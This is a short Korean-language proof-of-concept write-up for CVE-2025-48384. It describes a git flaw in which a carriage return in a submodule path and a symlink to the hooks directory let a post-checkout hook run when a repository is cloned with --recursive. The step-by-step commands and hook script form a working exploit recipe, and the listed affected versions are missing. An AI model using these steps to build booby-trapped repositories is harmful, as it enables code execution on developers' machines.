
CVE-2025-48384에 대한 PoC
CVE-2025-48384는 git에서 부적절한 링크 확인(링크 추적) 취약점의 형태를 띠고 있습니다. 구체적으로, 캐리지 리턴이 포함된 파일 이름이 .git/config에서 부적절하게 파싱되며, 서브모듈 훅 디렉토리로 서브모듈에 위치한 git 훅 실행 파일을 가리키는 심볼릭 링크를 포함하면 git clone --recursive로 리포지토리를 클론할 때 임의 코드 실행으로 이어질 수 있습니다.
Microsoft Windows용 Git은 이 취약점의 영향을 받지 않으며, 주로 Linux 및 MacOS의 특정 Git 버전이 취약합니다. 영향을 받는 버전은 다음과 같습니다:
post-checkout git 훅을 생성하여 poc 리포지토리가 재귀적으로 클론될 때 코드를 실행합니다:#!/bin/bash
touch ~/hackedlol
git submodule add https://github.com/<your submodule repo>.git sub 명령으로 서브모듈 리포지토리를 추가합니다.git mv sub $(printf "sub\r") 명령으로 새로 생성된 sub 폴더에 캐리지 리턴을 추가합니다..gitmodules에 를 에코하고 원래 경로를 제거합니다.printf "\tpath = \"sub\r\"\n"ln -s .git/modules/sub/hooks sub 명령으로 로컬 .git 디렉토리의 hooks 폴더에 대한 심볼릭 링크를 생성합니다.